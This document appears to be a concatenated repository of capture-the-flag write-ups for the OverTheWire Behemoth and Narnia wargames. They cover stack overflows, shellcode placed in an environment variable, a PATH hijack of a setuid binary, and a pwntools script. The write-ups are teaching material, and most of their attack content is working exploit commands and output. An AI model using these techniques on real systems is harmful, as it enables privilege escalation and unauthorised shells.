x/s *((char **)environ) 137 | 0xffffd835: "XDG_SESSION_ID=1977" 138 | (gdb) x/s *((char **)environ+1) 139 | 0xffffd849: "SHELL=/bin/bash" 140 | (gdb) x/s *((char **)environ+2) 141 | 0xffffd859: "TERM=xterm" 142 | (gdb) x/s *((char **)environ+3) 143 | 0xffffd864: "SSH_CLIENT=68.1.62.184 48350 22" 144 | (gdb) x/s *((char **)environ+4) 145 | 0xffffd884: "SSH_TTY=/dev/pts/3" 146 | (gdb) x/s *((char **)environ+5) 147 | 0xffffd897: "LC_ALL=C" 148 | (gdb) x/s *((char **)environ+6) 149 | 0xffffd8a0: "EGG=", '\220' , "\061\333\215C\027\231\315\200\061\311Qhn/shh//bi\215A\v\211\343\315\200" 150 | ̀" 151 | ``` 152 | 153 | Ok, now we have our shellcode loaded and we know it will be somewhere around ```0xffffd8a0```. Let's start brute forcing that address and see if we can hit our slide. 154 | 155 | ``` 156 | behemoth1@melinda:/behemoth$ python -c 'print "A"*79+"\xa0\xd8\xff\xff"' | ./behemoth1 157 | Password: Authentication failure. 158 | Sorry. 159 | Segmentation fault 160 | ``` 161 | 162 | ``` 163 | behemoth1@melinda:/behemoth$ python -c 'print "A"*79+"\xb0\xd8\xff\xff"' | ./behemoth1 164 | Password: Authentication failure. 165 | Sorry. 166 | ``` 167 | 168 | Ok, that one is different...but no command prompt. It seems like we hit our shellcode so let's try a few things. If you remember back to [narnia0](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia/Naria0) we had a similiar problem where we should have gotten a prompt but the program just exited. Let's try to use the tricks we learned there. We'll use the bash subshell command by wrapping the input being piped in with parenthesis and then concatenate the printed input with the ```cat``` command to try and force the prompt to stay open. 169 | 170 | ``` 171 | behemoth1@melinda:/behemoth$ (python -c 'print "A"*79+"\xb0\xd8\xff\xff"';cat) | ./behemoth1 172 | Password: Authentication failure. 173 | Sorry. 174 | whoami 175 | behemoth2 176 | cat /etc/behemoth_pass/behemoth2 177 | ********** 178 | ``` 179 | 180 | Sweet. I enjoyed this one since we got to reach back and utilize a lot of the methods that were learned in the previous series. Now behemoth2. 181 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth1/behemoth1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Behemoth/Behemoth1/behemoth1 -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth2/Readme.md: -------------------------------------------------------------------------------- 1 | #Behemoth2 2 | 3 | behemoth.labs.overthewire.org 4 | 5 | **Username:** behemoth2 6 | **Password:** see [behemoth1](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Behemoth/Behemoth1) 7 | **Description:** 8 | 9 | This wargame deals with a lot of regular vulnerabilities found commonly 'out in the wild'. While the game makes no attempts at emulating a real environment it will teach you how to exploit several of the most common coding mistakes including buffer overflows, race conditions and privilege escalation. 10 | 11 | ##Write-up 12 | 13 | Let's go ahead and see what we're working with: 14 | 15 | ``` 16 | # file behemoth2 17 | behemoth2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=490eca1266dce1c6fa5afd37392837976dba68ef, not stripped 18 | ``` 19 | ``` 20 | # ~/checksec.sh --file behemoth2 21 | RELRO STACK CANARY NX PIE RPATH RUNPATH FILE 22 | Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH behemoth2 23 | ``` 24 | 25 | Ok, we have a couple protections enabled, but they didn't really play a role in [behemoth0](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Behemoth/Behemoth0), so let's go ahead and dive in and see what this binary does. 26 | 27 | ``` 28 | # ./behemoth2 29 | Test 30 | ^C 31 | # ls 32 | 20977 behemoth2 33 | ``` 34 | 35 | Pretty weird. Didn't really do anything, but it did end up creating a file locally after I gave it some input. Let's see what the disassembly looks like. 36 | 37 | ```asm 38 | main: 39 | 0804856d push ebp ; XREF=_start+23 40 | 0804856e mov ebp, esp 41 | 08048570 and esp, 0xfffffff0 42 | 08048573 sub esp, 0xa0 43 | 08048579 mov eax, dword [gs:0x14] 44 | 0804857f mov dword [ss:esp+0x9c], eax 45 | 08048586 xor eax, eax 46 | 08048588 call j_getpid 47 | 0804858d mov dword [ss:esp+0x1c], eax 48 | 08048591 lea eax, dword [ss:esp+0x24] 49 | 08048595 add eax, 0x6 50 | 08048598 mov dword [ss:esp+0x20], eax 51 | 0804859c mov eax, dword [ss:esp+0x1c] 52 | 080485a0 mov dword [ss:esp+0x8], eax 53 | 080485a4 mov dword [ss:esp+0x4], 0x804870c ; "touch %d", argument "format" for method j_sprintf 54 | 080485ac lea eax, dword [ss:esp+0x24] 55 | 080485b0 mov dword [ss:esp], eax ; argument "str" for method j_sprintf 56 | 080485b3 call j_sprintf 57 | 080485b8 lea eax, dword [ss:esp+0x38] 58 | 080485bc mov dword [ss:esp+0x4], eax ; argument #2 for method __lstat 59 | 080485c0 mov eax, dword [ss:esp+0x20] 60 | 080485c4 mov dword [ss:esp], eax ; argument #1 for method __lstat 61 | 080485c7 call __lstat 62 | 080485cc and eax, 0xf000 63 | 080485d1 cmp eax, 0x8000 64 | 080485d6 je 0x80485f0 65 | 66 | 080485d8 mov eax, dword [ss:esp+0x20] 67 | 080485dc mov dword [ss:esp], eax ; argument "path" for method j_unlink 68 | 080485df call j_unlink 69 | 080485e4 lea eax, dword [ss:esp+0x24] 70 | 080485e8 mov dword [ss:esp], eax ; argument "command" for method j_system 71 | 080485eb call j_system 72 | 73 | 080485f0 mov dword [ss:esp], 0x7d0 ; argument "seconds" for method j_sleep, XREF=main+105 74 | 080485f7 call j_sleep 75 | 080485fc lea eax, dword [ss:esp+0x24] 76 | 08048600 mov dword [ds:eax], 0x20746163 77 | 08048606 mov byte [ds:eax+0x4], 0x0 78 | 0804860a mov byte [ss:esp+0x28], 0x20 79 | 0804860f lea eax, dword [ss:esp+0x24] 80 | 08048613 mov dword [ss:esp], eax ; argument "command" for method j_system 81 | 08048616 call j_system 82 | 0804861b mov eax, 0x0 83 | 08048620 mov edx, dword [ss:esp+0x9c] 84 | 08048627 xor edx, dword [gs:0x14] 85 | 0804862e je 0x8048635 86 | 87 | 08048630 call j___stack_chk_fail 88 | 89 | 08048635 leave ; XREF=main+193 90 | 08048636 ret 91 | ; endp 92 | ``` 93 | 94 | Ok, we have a few things to track down here. We can see a call to ```getpid```, ```sprintf```, ```lstat```, ```unlink```, ```system```, and ```sleep```. I'm not 100% sure what ```lstat``` and ```unlink``` do, so let's take a look at them first. Starting with ```lstat```, we can see that it is used to determine information about a file based on its filename. Next we have ```unlink``` which appears to remove a link to a file if it exists. 95 | 96 | We can follow the assembly here a little, but let's see what [Hopper](http://www.hopperapp.com) will give us for the psuedocode. 97 | 98 | ```C 99 | int main(int arg0) { 100 | esp = (esp & 0xfffffff0) - 0xa0; 101 | getpid(); 102 | eax = *(esp + 0x1c); 103 | sprintf(esp + 0x24, "touch %d", eax); 104 | if ((__lstat(*(esp + 0x20), esp + 0x38) & 0xf000) != 0x8000) { 105 | eax = *(esp + 0x20); 106 | unlink(eax); 107 | system(esp + 0x24); 108 | } 109 | sleep(0x7d0); 110 | *(esp + 0x24) = 0x20746163; 111 | *(int8_t *)(esp + 0x28) = 0x0; 112 | system(esp + 0x24); 113 | eax = 0x0; 114 | edx = *(esp + 0x9c); 115 | edx = edx ^ *0x14; 116 | COND = edx == 0x0; 117 | if (!COND) { 118 | eax = __stack_chk_fail(); 119 | } 120 | return eax; 121 | } 122 | ``` 123 | 124 | We can see that both calls to system, which is mostly likely where we want to be, are using ```esp + 0x24``` as their parameter. Looking at the line ```sprintf(esp + 0x24, "touch %d", eax);``` it looks as though ```esp + 0x24``` should be the string ```touch ``` where `````` is the actual process id. This also makes sense that we were seeing weird files being generated upon execution. Now, we need to figure out how to take over that command in order to try and get a shell. So, in general, how does the system know where the ```touch``` command is? It's not in the local directory, and even if it was you would need ```./touch``` to call it. So this all ties back to the ```PATH``` environment variable. If you lookup the definition of what the ```PATH``` variable is you'll find this or something similiar: 125 | >"PATH is an environmental variable in Linux and other Unix-like operating systems that tells the shell which directories to search for executable files (i.e., ready-to-run programs) in response to commands issued by a user." 126 | So let's look at our ```PATH``` and see where the system is looking for the command ```touch```. 127 | 128 | ``` 129 | # echo $PATH 130 | /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 131 | # whereis touch 132 | touch: /usr/bin/touch /bin/touch /usr/share/man/man1/touch.1.gz 133 | ``` 134 | 135 | If we look at where ```touch``` actually exists on the system and then where the ```PATH``` references one of those locations we will see that ```touch``` is actually being called from ```/usr/bin```. We should be able to create our own ```touch``` command and add its location to the beginging of the ```PATH```, or at least before ```/usr/bin``` in the path, and our command should be used. Let's try. 136 | 137 | ``` 138 | # echo /bin/dash > touch 139 | # cat touch 140 | /bin/dash 141 | # chmod +x touch 142 | # ./touch 143 | $ whoami 144 | root 145 | ``` 146 | 147 | I changed the actual prompt so you could see the difference, but after creating a new script called ```touch``` that executes a new shell I ran it to make sure everything was working correctly. Now let's update our ```PATH``` and try to re-run ```behemoth2```. 148 | 149 | ``` 150 | # export PATH=~/CTF/OverTheWire/behemoth/:$PATH 151 | # echo $PATH 152 | /root/CTF/OverTheWire/behemoth/:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 153 | # ./behemoth2 154 | $ whoami 155 | root 156 | ``` 157 | 158 | So we can see that by adding the directory of our newly created ```touch``` command to the begining of the ```PATH``` we have take over that command and now instead of an arbitraty file being created we are greeted with a shell. Let's head to the server and see if we can duplicate it without too much trouble. 159 | 160 | ``` 161 | behemoth2@melinda:/behemoth$ mktemp -d 162 | /tmp/tmp.T2jaQATLdj 163 | behemoth2@melinda:/behemoth$ echo /bin/dash > /tmp/tmp.T2jaQATLdj/touch 164 | behemoth2@melinda:/behemoth$ chmod +x /tmp/tmp.T2jaQATLdj/touch 165 | behemoth2@melinda:/behemoth$ export PATH=/tmp/tmp.T2jaQATLdj:$PATH 166 | behemoth2@melinda:/behemoth$ ./behemoth2 167 | touch: cannot touch '6686': Permission denied 168 | ``` 169 | 170 | Hmmm, it looks like the new ```PATH``` wasn't used. Let's verify everything. 171 | 172 | ``` 173 | behemoth2@melinda:/behemoth$ echo $PATH 174 | /tmp/tmp.T2jaQATLdj:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games 175 | behemoth2@melinda:/behemoth$ ls /tmp/tmp.T2jaQATLdj 176 | touch 177 | behemoth2@melinda:/behemoth$ /tmp/tmp.T2jaQATLdj/touch 178 | $ 179 | ``` 180 | 181 | Well that worked... 182 | 183 | Wouldn't be the first time we've had permission issues. Let's make sure ```behemoth3``` has access to our ```touch``` command. 184 | 185 | ``` 186 | behemoth2@melinda:/behemoth$ chmod 777 /tmp/tmp.T2jaQATLdj/ 187 | behemoth2@melinda:/behemoth$ ./behemoth2 188 | $ whoami 189 | behemoth3 190 | $ cat /etc/behemoth_pass/behemoth3 191 | ********** 192 | ``` 193 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth2/behemoth2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Behemoth/Behemoth2/behemoth2 -------------------------------------------------------------------------------- /Misc/OverTheWire/Behemoth/Behemoth3/behemoth3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Behemoth/Behemoth3/behemoth3 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Naria0/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | #Narnia0 3 | 4 | narnia.labs.overthewire.org 5 | 6 | **Username:** narnia0 7 | **Password:** narnia0 8 | **Description:** 9 | 10 | This wargame is for the ones that want to learn basic exploitation. You can see the most common bugs in this game and we've tried to make them easy to exploit. You'll get the source code of each level to make it easier for you to spot the vuln and abuse it. 11 | 12 | ##Write-up 13 | 14 | Before we do anything, let's go ahead and run the program and see what it does. 15 | 16 | ``` 17 | # ./narnia0 18 | Correct val's value from 0x41414141 -> 0xdeadbeef! 19 | Here is your chance: AAAAAAAA 20 | buf: AAAAAAAA 21 | val: 0x41414141 22 | WAY OFF!!!! 23 | ``` 24 | 25 | Ok, it basically just tell's us that we need to correct a value and asks for input. After accepting the input it looks like it just tells us the value that we submitted and the value of the area we are supposed to overwrite. 26 | 27 | Let's go ahead and take a peek at the source: 28 | 29 | ```C 30 | /* 31 | This program is free software; you can redistribute it and/or modify 32 | it under the terms of the GNU General Public License as published by 33 | the Free Software Foundation; either version 2 of the License, or 34 | (at your option) any later version. 35 | 36 | This program is distributed in the hope that it will be useful, 37 | but WITHOUT ANY WARRANTY; without even the implied warranty of 38 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 39 | GNU General Public License for more details. 40 | 41 | You should have received a copy of the GNU General Public License 42 | along with this program; if not, write to the Free Software 43 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 44 | */ 45 | #include 46 | #include 47 | 48 | int main(){ 49 | long val=0x41414141; 50 | char buf[20]; 51 | 52 | printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n"); 53 | printf("Here is your chance: "); 54 | scanf("%24s",&buf); 55 | 56 | printf("buf: %s\n",buf); 57 | printf("val: 0x%08x\n",val); 58 | 59 | if(val==0xdeadbeef) 60 | system("/bin/sh"); 61 | else { 62 | printf("WAY OFF!!!!\n"); 63 | exit(1); 64 | } 65 | 66 | return 0; 67 | } 68 | ``` 69 | 70 | Alright, we can see the declaration of the buffer ```char buf[20];``` and where the input is read in ```scanf("%24s",&buf);```. It also looks like if we get our values correct that we will be rewarded quite generously with a shell. How nice! Let's play around with this new information a bit. If the buffer was only supposed to be 20 characters, let's see what happens when our input is 21 characters, but since it looks like the buffer we want to overwrite has ```0x41414141``` already in it we are going to have to use another letter besides ```A``` as our input. We'll settle for ```R```. Just as a quick side note, rather than inputting the values by hand each time let's utilize python to make life easier and just pipe in the input. 71 | 72 | ``` 73 | # python -c 'print "R"*21' | ./narnia0 74 | Correct val's value from 0x41414141 -> 0xdeadbeef! 75 | Here is your chance: buf: RRRRRRRRRRRRRRRRRRRRR 76 | val: 0x41410052 77 | WAY OFF!!!! 78 | ``` 79 | 80 | Hmm, it looks like we overwrote one character with the null value at the end of the input overwriting a second. It also looks like it started overwriting from the back, so we'll need to remember to take the endianness into account for our final input. Let's try overwriting all 4 characters of the buffer. 81 | 82 | ``` 83 | # python -c 'print "R"*24' | ./narnia0 84 | Correct val's value from 0x41414141 -> 0xdeadbeef! 85 | Here is your chance: buf: RRRRRRRRRRRRRRRRRRRRRRRR 86 | val: 0x52525252 87 | WAY OFF!!!! 88 | ``` 89 | 90 | Perfect, we overwrote the whole buffer with our input. Now, lets start trying to fit ```0xdeadbeef``` in there. Since the hex values for ```0xdeadbeef``` don't match up to ascii characters we need a way to insert them as input. We are already using python for the repetitive input, let's just back off our number of ```R``` and tag on hex values to the end of that string and see what it does. 91 | 92 | ``` 93 | # python -c 'print "R"*20+"\xde\xad\xbe\xef"' | ./narnia0 94 | Correct val's value from 0x41414141 -> 0xdeadbeef! 95 | Here is your chance: buf: RRRRRRRRRRRRRRRRRRRRޭ� 96 | val: 0xefbeadde 97 | WAY OFF!!!! 98 | ``` 99 | Our buffer shows that we inserted ```RRRRRRRRRRRRRRRRRRRRޭ�``` which we obviously wouldn't have been able to type in. However, we forget about the little endian part and our values aren't in the correct order. Let's fix that. 100 | 101 | ``` 102 | # python -c 'print "R"*20+"\xef\xbe\xad\xde"' | ./narnia0 103 | Correct val's value from 0x41414141 -> 0xdeadbeef! 104 | Here is your chance: buf: RRRRRRRRRRRRRRRRRRRRᆳ 105 | val: 0xdeadbeef 106 | ``` 107 | 108 | Well, we didn't get the ```WAY OFF!!!``` message, but no shell. I actually spent a good bit of time at this stage, but learned a few key concepts in doing so. The shell is being launched, but the problem is that it's exiting before we have a chance to run anything. What we need to do is use the subshell syntax in bash and try to group commands together. Let's try that with a basic command. 109 | 110 | ``` 111 | narnia0@melinda:/narnia$ (python -c 'print "A"*20+"\xef\xbe\xad\xde"';ls) | ./narnia0 112 | Correct val's value from 0x41414141 -> 0xdeadbeef! 113 | Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ 114 | val: 0xdeadbeef 115 | /bin/sh: 1: narnia0: not found 116 | /bin/sh: 2: narnia0.c: not found 117 | /bin/sh: 3: narnia1: not found 118 | /bin/sh: 4: narnia1.c: not found 119 | /bin/sh: 5: narnia2: not found 120 | /bin/sh: 6: narnia2.c: not found 121 | /bin/sh: 7: narnia3: not found 122 | /bin/sh: 8: narnia3.c: not found 123 | /bin/sh: 9: narnia4: not found 124 | /bin/sh: 10: narnia4.c: not found 125 | /bin/sh: 11: narnia5: not found 126 | /bin/sh: 12: narnia5.c: not found 127 | /bin/sh: 13: narnia6: not found 128 | /bin/sh: 14: narnia6.c: not found 129 | /bin/sh: 15: narnia7: not found 130 | /bin/sh: 16: narnia7.c: not found 131 | /bin/sh: 17: narnia8: not found 132 | /bin/sh: 18: narnia8.c: not found 133 | ``` 134 | 135 | Now this looks a little better. It looks like the output from ```ls``` was passed into the /bin/sh from narnia0. Here we can utilize the ```cat``` command with no parameters which will basically leave the input open for us to pass values to /bin/sh. 136 | 137 | ``` 138 | narnia0@melinda:/narnia$ (python -c 'print "A"*20+"\xef\xbe\xad\xde"';cat) | ./narnia0 139 | Correct val's value from 0x41414141 -> 0xdeadbeef! 140 | Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ 141 | val: 0xdeadbeef 142 | whoami 143 | narnia1 144 | pwd 145 | /narnia 146 | ``` 147 | 148 | Finally. The ```cat``` command left the input open for us and everything we passed was executed by /bin/sh as a separate command. Now we just need to find where the flag may be. 149 | 150 | ``` 151 | narnia0@melinda:/narnia$ find / -name 'narnia*' -print 2>/dev/null 152 | /games/narnia 153 | /games/narnia/narnia8 154 | /games/narnia/narnia6.c 155 | /games/narnia/narnia6 156 | /games/narnia/narnia3 157 | /games/narnia/narnia7 158 | /games/narnia/narnia4 159 | /games/narnia/narnia2.c 160 | /games/narnia/narnia3.c 161 | /games/narnia/narnia1 162 | /games/narnia/narnia5 163 | /games/narnia/narnia4.c 164 | /games/narnia/narnia5.c 165 | /games/narnia/narnia0 166 | /games/narnia/narnia2 167 | /games/narnia/narnia1.c 168 | /games/narnia/narnia7.c 169 | /games/narnia/narnia8.c 170 | /games/narnia/narnia0.c 171 | /etc/narnia_pass 172 | /etc/narnia_pass/narnia3 173 | /etc/narnia_pass/narnia7 174 | /etc/narnia_pass/narnia5 175 | /etc/narnia_pass/narnia1 176 | /etc/narnia_pass/narnia8 177 | /etc/narnia_pass/narnia6 178 | /etc/narnia_pass/narnia9 179 | /etc/narnia_pass/narnia0 180 | /etc/narnia_pass/narnia2 181 | /etc/narnia_pass/narnia4 182 | /narnia 183 | /home/narnia3 184 | /home/narnia7 185 | /home/narnia5 186 | /home/narnia1 187 | /home/narnia8 188 | /home/narnia6 189 | /home/narnia9 190 | /home/narnia0 191 | /home/narnia2 192 | /home/narnia4 193 | ``` 194 | 195 | The ```find / -name 'narnia*'``` is a fairly basic command. The ```-print 2>/dev/null``` is basically just there to eliminate any errors that may clutter the output. Out of our results the most promising is the ```/etc/narnia_pass``` directory that looks like there is a password document for each challenge. Since we already have the password for narnia0, let's try to grab the narnia1 password. 196 | 197 | ``` 198 | narnia0@melinda:/narnia$ cat /etc/narnia_pass/narnia1 199 | cat: /etc/narnia_pass/narnia1: Permission denied 200 | narnia0@melinda:/narnia$ ls -l /etc/narnia_pass/narnia1 201 | -r-------- 1 narnia1 narnia1 11 Nov 14 2014 /etc/narnia_pass/narnia1 202 | narnia0@melinda:/narnia$ ls -l narnia0 203 | -r-sr-x--- 1 narnia1 narnia0 7452 Nov 14 2014 narnia0 204 | ``` 205 | 206 | We can't just ```cat``` the narnia1 password because we don't have permissions but it looks like the narnia0 challege runs under narnia1. Let's use our subshell trick and try to read the password. 207 | 208 | ``` 209 | narnia0@melinda:/narnia$ (python -c 'print "A"*20+"\xef\xbe\xad\xde"';cat) | ./narnia0 210 | Correct val's value from 0x41414141 -> 0xdeadbeef! 211 | Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ 212 | val: 0xdeadbeef 213 | cat /etc/narnia_pass/narnia1 214 | ********** 215 | ``` 216 | 217 | There we go. Finally got it. On to narnia1. 218 | 219 | As a followup, I wanted to work my way back through these challenges implementing the solutions with the [pwntools](http://pwntools.com) python module in an effort to sharpen my python skills and learn how to utilize this module for future CTF fun. Below is my solution: 220 | 221 | ```python 222 | from pwn import * 223 | 224 | context(arch='i386', os='linux') 225 | s = ssh(user='narnia0', host='narnia.labs.overthewire.org', password='narnia0') 226 | sh = s.run('/narnia/narnia0') 227 | sh.sendline('A'*20 + p32(0xdeadbeef)) 228 | sh.sendline('cat /etc/narnia_pass/narnia1') 229 | log.info('Flag: '+sh.recvline().split('\n')[0]) 230 | s.close() 231 | ``` 232 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Naria0/narnia0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Naria0/narnia0 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Naria0/narnia0.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | 19 | int main(){ 20 | long val=0x41414141; 21 | char buf[20]; 22 | 23 | printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n"); 24 | printf("Here is your chance: "); 25 | scanf("%24s",&buf); 26 | 27 | printf("buf: %s\n",buf); 28 | printf("val: 0x%08x\n",val); 29 | 30 | if(val==0xdeadbeef) 31 | system("/bin/sh"); 32 | else { 33 | printf("WAY OFF!!!!\n"); 34 | exit(1); 35 | } 36 | 37 | return 0; 38 | } 39 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia1/Readme.md: -------------------------------------------------------------------------------- 1 | #Narnia1 2 | 3 | narnia.labs.overthewire.org 4 | 5 | **Username:** narnia1 6 | **Password:** see [narnia0](https://github.com/Alpackers/CTF-Writeups/tree/master/Misc/OverTheWire/Narnia/Naria0) 7 | **Description:** 8 | > This wargame is for the ones that want to learn basic exploitation. You can see the most common bugs in this game and we've tried to make them easy to exploit. You'll get the source code of each level to make it easier for you to spot the vuln and abuse it. 9 | 10 | ##Write-up 11 | 12 | > Again, let's go ahead and run the program and see what it does. 13 | > 14 | >``` 15 | # ./narnia1 16 | Give me something to execute at the env-variable EGG 17 | >``` 18 | > Ok, it looks like we are going to be messing with environment variables. 19 | > 20 | > Let's go ahead and take a peek at the source: 21 | > 22 | >```C 23 | >/* 24 | > This program is free software; you can redistribute it and/or modify 25 | > it under the terms of the GNU General Public License as published by 26 | > the Free Software Foundation; either version 2 of the License, or 27 | > (at your option) any later version. 28 | > 29 | > This program is distributed in the hope that it will be useful, 30 | > but WITHOUT ANY WARRANTY; without even the implied warranty of 31 | > MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 32 | > GNU General Public License for more details. 33 | > 34 | > You should have received a copy of the GNU General Public License 35 | > along with this program; if not, write to the Free Software 36 | > Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 37 | >*/ 38 | >#include 39 | > 40 | >int main(){ 41 | > int (*ret)(); 42 | > 43 | > if(getenv("EGG")==NULL){ 44 | > printf("Give me something to execute at the env-variable EGG\n"); 45 | > exit(1); 46 | > } 47 | > 48 | > printf("Trying to execute EGG!\n"); 49 | > ret = getenv("EGG"); 50 | > ret(); 51 | > 52 | > return 0; 53 | >} 54 | >``` 55 | > 56 | > This one looks straight forward, but at the same time, I don't quite know how ```getenv("EGG");``` is going to work. What it looks like to someone who isn't the best ```C``` programmer is that we are going to read in the value of environment variable ```EGG``` and execute whatever is in there. Let's try a basic command and see what it does. 57 | > 58 | >``` 59 | ># export EGG=ls 60 | ># echo $EGG 61 | >ls 62 | ># ./narnia1 63 | >Trying to execute EGG! 64 | >Segmentation fault 65 | >``` 66 | > 67 | > Ok, clearly there is more going on here. Let's bust out our dissassembler and see what's going on at the ```getenv("EGG");``` line. 68 | > 69 | >```asm 70 | > main: 71 | >0804847d push ebp ; XREF=_start+23 72 | >0804847e mov ebp, esp 73 | >08048480 and esp, 0xfffffff0 74 | >08048483 sub esp, 0x20 75 | >08048486 mov dword [ss:esp], 0x8048570 ; argument "name" for method j_getenv 76 | >0804848d call j_getenv 77 | >08048492 test eax, eax 78 | >08048494 jne 0x80484ae 79 | > 80 | >08048496 mov dword [ss:esp], 0x8048574 ; "Give me something to execute at the env-variable EGG", argument "s" for method j_puts 81 | >0804849d call j_puts 82 | >080484a2 mov dword [ss:esp], 0x1 ; argument "status" for method j_exit 83 | >080484a9 call j_exit 84 | > 85 | >080484ae mov dword [ss:esp], 0x80485a9 ; "Trying to execute EGG!", argument "s" for method j_puts, XREF=main+23 86 | >080484b5 call j_puts 87 | >080484ba mov dword [ss:esp], 0x8048570 ; argument "name" for method j_getenv 88 | >080484c1 call j_getenv 89 | >080484c6 mov dword [ss:esp+0x1c], eax 90 | >080484ca mov eax, dword [ss:esp+0x1c] 91 | >080484ce call eax 92 | >080484d0 mov eax, 0x0 93 | >080484d5 leave 94 | >080484d6 ret 95 | >``` 96 | > 97 | > Well, we can see the call to ```j_getenv``` at ```0x080484c1``` and there appears to be call directly after that at ```0x080484ce```. Let's setup gdb and break at that point. 98 | > 99 | >```asm 100 | ># gdb narnia1 101 | >(gdb) display/a $eax 102 | >(gdb) break *0x080484ce 103 | >Breakpoint 1 at 0x80484ce 104 | >(gdb) run 105 | >Starting program: /root/narnia1 106 | >warning: no loadable sections found in added symbol-file system-supplied DSO at 0xf7fde000 107 | >Trying to execute EGG! 108 | > 109 | >Breakpoint 1, 0x080484ce in main () 110 | >1: /a $eax = 0xffffd806 111 | >(gdb) x/100x $eax 112 | >0xffffd806: 0x5500736c 0x3d524553 0x746f6f72 0x5f534c00 113 | >0xffffd816: 0x4f4c4f43 0x723d5352 0x3a303d73 0x303d6964 114 | >0xffffd826: 0x34333b31 0x3d6e6c3a 0x333b3130 0x686d3a36 115 | >0xffffd836: 0x3a30303d 0x343d6970 0x33333b30 0x3d6f733a 116 | >0xffffd846: 0x333b3130 0x6f643a35 0x3b31303d 0x623a3533 117 | >0xffffd856: 0x30343d64 0x3b33333b 0x633a3130 0x30343d64 118 | >0xffffd866: 0x3b33333b 0x6f3a3130 0x30343d72 0x3b31333b 119 | >0xffffd876: 0x733a3130 0x37333d75 0x3a31343b 0x333d6773 120 | >0xffffd886: 0x33343b30 0x3d61633a 0x343b3033 0x77743a31 121 | >0xffffd896: 0x3b30333d 0x6f3a3234 0x34333d77 0x3a32343b 122 | >0xffffd8a6: 0x333d7473 0x34343b37 0x3d78653a 0x333b3130 123 | >0xffffd8b6: 0x2e2a3a32 0x3d726174 0x333b3130 0x2e2a3a31 124 | >0xffffd8c6: 0x3d7a6774 0x333b3130 0x2e2a3a31 0x3d6a7261 125 | >0xffffd8d6: 0x333b3130 0x2e2a3a31 0x3d7a6174 0x333b3130 126 | >0xffffd8e6: 0x2e2a3a31 0x3d687a6c 0x333b3130 0x2e2a3a31 127 | >0xffffd8f6: 0x616d7a6c 0x3b31303d 0x2a3a3133 0x7a6c742e 128 | >0xffffd906: 0x3b31303d 0x2a3a3133 0x7a78742e 0x3b31303d 129 | >0xffffd916: 0x2a3a3133 0x70697a2e 0x3b31303d 0x2a3a3133 130 | >0xffffd926: 0x303d7a2e 0x31333b31 0x5a2e2a3a 0x3b31303d 131 | >0xffffd936: 0x2a3a3133 0x3d7a642e 0x333b3130 0x2e2a3a31 132 | >0xffffd946: 0x303d7a67 0x31333b31 0x6c2e2a3a 0x31303d7a 133 | >0xffffd956: 0x3a31333b 0x7a782e2a 0x3b31303d 0x2a3a3133 134 | >0xffffd966: 0x327a622e 0x3b31303d 0x2a3a3133 0x3d7a622e 135 | >0xffffd976: 0x333b3130 0x2e2a3a31 0x3d7a6274 0x333b3130 136 | >0xffffd986: 0x2e2a3a31 0x327a6274 0x3b31303d 0x2a3a3133 137 | >``` 138 | > 139 | > Ah, so it looks like our ```ls``` is at ```0xffffd808``` and ```ffffd809```. At those two addresses we see the values ```0x73``` and ```0x6c``` respectively which translate back to ```s``` and ```l```. So it looks like if we load valid shellcode into the ```EGG``` environment variable it should be executed as the ```call``` will basically be pointed to the shellcode itself. I'll just use some shellcode that I got out of exploit-db. 140 | > 141 | >``` 142 | ># cat /usr/share/exploitdb/platforms/lin_x86/shellcode/13333.txt 143 | >-------------------[ASM]---------------------- 144 | > 